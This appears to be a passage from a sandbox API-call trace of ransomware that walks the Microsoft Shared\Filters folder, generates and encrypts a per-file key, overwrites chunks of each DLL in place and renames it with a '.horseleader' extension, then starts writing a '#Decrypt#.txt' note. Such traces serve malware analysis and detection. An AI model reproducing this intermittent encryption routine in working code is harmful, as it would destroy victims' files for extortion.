(in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\..") returned 61 [0226.064] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0226.064] lstrcmpW (lpString1="..", lpString2="..") returned 0 
[0226.064] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x69e61cd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x9770, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="msgfilt.dll", cAlternateFileName="")) returned 1 [0226.064] lstrcmpiW (lpString1="msgfilt.dll", lpString2="Windows") returned -1 [0226.064] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0226.064] StrStrIW (lpFirst="msgfilt.dll", lpSrch=".horseleader") returned 0x0 [0226.064] lstrcmpW (lpString1="msgfilt.dll", lpString2="#Decrypt#.txt") returned 1 [0226.064] lstrcmpW (lpString1="msgfilt.dll", lpString2="_uninstalling_.png") returned 1 [0226.064] lstrlenW (lpString=".testttjffg") returned 11 [0226.064] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll", lpSrch=".testttjffg") returned 0x0 [0226.064] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.064] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.064] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.066] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\Filters\\msgfilt.dll") returned 70 [0226.066] StrStrW (lpFirst="msgfilt.dll", lpSrch=".txt") returned 0x0 [0226.066] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=38768) returned 1 [0226.066] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.069] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.069] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.070] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x4770, lpOverlapped=0x0) returned 1 [0226.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb890, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.070] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x4770, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x4770, lpOverlapped=0x0) returned 1 [0226.070] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.070] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.071] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.071] CloseHandle (hObject=0x158) returned 1 [0226.071] GetProcessHeap () returned 0x780000 [0226.071] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.071] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.horseleader") returned 82 [0226.071] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\msgfilt.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\msgfilt.dll.horseleader")) returned 1 [0226.072] GetProcessHeap () returned 0x780000 [0226.072] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.072] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x6b29d7d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x140790, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="odffilt.dll", cAlternateFileName="")) returned 1 [0226.072] lstrcmpiW (lpString1="odffilt.dll", lpString2="Windows") returned -1 [0226.072] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0226.072] StrStrIW (lpFirst="odffilt.dll", lpSrch=".horseleader") returned 0x0 [0226.072] 
lstrcmpW (lpString1="odffilt.dll", lpString2="#Decrypt#.txt") returned 1 [0226.072] lstrcmpW (lpString1="odffilt.dll", lpString2="_uninstalling_.png") returned 1 [0226.072] lstrlenW (lpString=".testttjffg") returned 11 [0226.072] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll", lpSrch=".testttjffg") returned 0x0 [0226.072] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.072] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.072] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll") returned 70 [0226.074] StrStrW (lpFirst="odffilt.dll", lpSrch=".txt") returned 0x0 [0226.074] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1312656) returned 1 [0226.074] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.074] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.076] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.077] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, 
lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.078] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x9dbc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.078] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.080] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.080] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.080] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x13b790, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.080] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.092] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.092] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.092] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.092] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, 
lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.093] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.093] CloseHandle (hObject=0x158) returned 1 [0226.093] GetProcessHeap () returned 0x780000 [0226.093] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.093] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.horseleader") returned 82 [0226.093] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\odffilt.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\odffilt.dll.horseleader")) returned 1 [0226.096] GetProcessHeap () returned 0x780000 [0226.096] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.096] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4e922100, ftCreationTime.dwHighDateTime=0x1caafc8, ftLastAccessTime.dwLowDateTime=0x596c1850, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x4e922100, ftLastWriteTime.dwHighDateTime=0x1caafc8, nFileSizeHigh=0x0, nFileSizeLow=0x16af90, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="offfiltx.dll", cAlternateFileName="")) returned 1 [0226.096] lstrcmpiW (lpString1="offfiltx.dll", lpString2="Windows") returned -1 [0226.096] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" 
| out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0226.096] StrStrIW (lpFirst="offfiltx.dll", lpSrch=".horseleader") returned 0x0 [0226.096] lstrcmpW (lpString1="offfiltx.dll", lpString2="#Decrypt#.txt") returned 1 [0226.096] lstrcmpW (lpString1="offfiltx.dll", lpString2="_uninstalling_.png") returned 1 [0226.096] lstrlenW (lpString=".testttjffg") returned 11 [0226.097] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll", lpSrch=".testttjffg") returned 0x0 [0226.097] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.097] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.097] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll") returned 71 [0226.133] StrStrW (lpFirst="offfiltx.dll", lpSrch=".txt") returned 0x0 [0226.133] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=1486736) returned 1 [0226.133] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.133] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.136] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.136] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.137] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xb2fc8, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.137] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.139] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.140] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.140] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x165f90, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.140] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.143] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.143] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.143] SetFilePointerEx (in: hFile=0x158, 
liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.143] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.144] CloseHandle (hObject=0x158) returned 1 [0226.144] GetProcessHeap () returned 0x780000 [0226.144] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.144] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.horseleader") returned 83 [0226.144] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\offfiltx.dll.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\offfiltx.dll.horseleader")) returned 1 [0226.145] GetProcessHeap () returned 0x780000 [0226.145] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.145] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0xfb834915, 
dwReserved1=0xd3dda4fd, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 1 [0226.145] lstrcmpiW (lpString1="VISFILT.DLL", lpString2="Windows") returned -1 [0226.145] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0226.145] StrStrIW (lpFirst="VISFILT.DLL", lpSrch=".horseleader") returned 0x0 [0226.145] lstrcmpW (lpString1="VISFILT.DLL", lpString2="#Decrypt#.txt") returned 1 [0226.145] lstrcmpW (lpString1="VISFILT.DLL", lpString2="_uninstalling_.png") returned 1 [0226.145] lstrlenW (lpString=".testttjffg") returned 11 [0226.145] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL", lpSrch=".testttjffg") returned 0x0 [0226.145] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aed10 | out: pbBuffer=0x32aed10) returned 1 [0226.145] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x24, dwBufLen=0x80 | out: pbData=0x32aed10*, pdwDataLen=0x32aedcc*=0x80) returned 1 [0226.145] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0226.146] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL") returned 70 [0226.147] StrStrW (lpFirst="VISFILT.DLL", lpSrch=".txt") returned 0x0 [0226.147] GetFileSizeEx (in: hFile=0x158, lpFileSize=0x32aedd0 | out: lpFileSize=0x32aedd0*=2124664) returned 1 [0226.147] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.147] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, 
nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.149] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.149] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.153] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x100dbc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.153] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.157] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.157] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x201b78, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.157] ReadFile (in: hFile=0x158, lpBuffer=0x32a9d10, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesRead=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0226.161] WriteFile (in: hFile=0x158, lpBuffer=0x32a9d10*, 
nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32a9d10*, lpNumberOfBytesWritten=0x32aedf4*=0x5000, lpOverlapped=0x0) returned 1 [0226.161] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0226.161] WriteFile (in: hFile=0x158, lpBuffer=0x32aedc8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aedc8*, lpNumberOfBytesWritten=0x32aedf4*=0x4, lpOverlapped=0x0) returned 1 [0226.162] WriteFile (in: hFile=0x158, lpBuffer=0x32aed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32aedf4, lpOverlapped=0x0 | out: lpBuffer=0x32aed10*, lpNumberOfBytesWritten=0x32aedf4*=0x80, lpOverlapped=0x0) returned 1 [0226.162] CloseHandle (hObject=0x158) returned 1 [0226.162] GetProcessHeap () returned 0x780000 [0226.162] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7db828 [0226.162] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.horseleader") returned 82 [0226.162] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\VISFILT.DLL.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\visfilt.dll.horseleader")) returned 1 [0226.163] GetProcessHeap () returned 0x780000 [0226.163] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7db828 | out: hHeap=0x780000) returned 1 [0226.163] FindNextFileW (in: hFindFile=0x7c6860, lpFindFileData=0x32aee18 | out: lpFindFileData=0x32aee18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46d35b00, ftCreationTime.dwHighDateTime=0x1cba077, 
ftLastAccessTime.dwLowDateTime=0xd9e40080, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x46d35b00, ftLastWriteTime.dwHighDateTime=0x1cba077, nFileSizeHigh=0x0, nFileSizeLow=0x206b78, dwReserved0=0xfb834915, dwReserved1=0xd3dda4fd, cFileName="VISFILT.DLL", cAlternateFileName="")) returned 0 [0226.163] FindClose (in: hFindFile=0x7c6860 | out: hFindFile=0x7c6860) returned 1 [0226.164] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\#Decrypt#.txt") returned 72 [0226.164] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Filters\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\filters\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 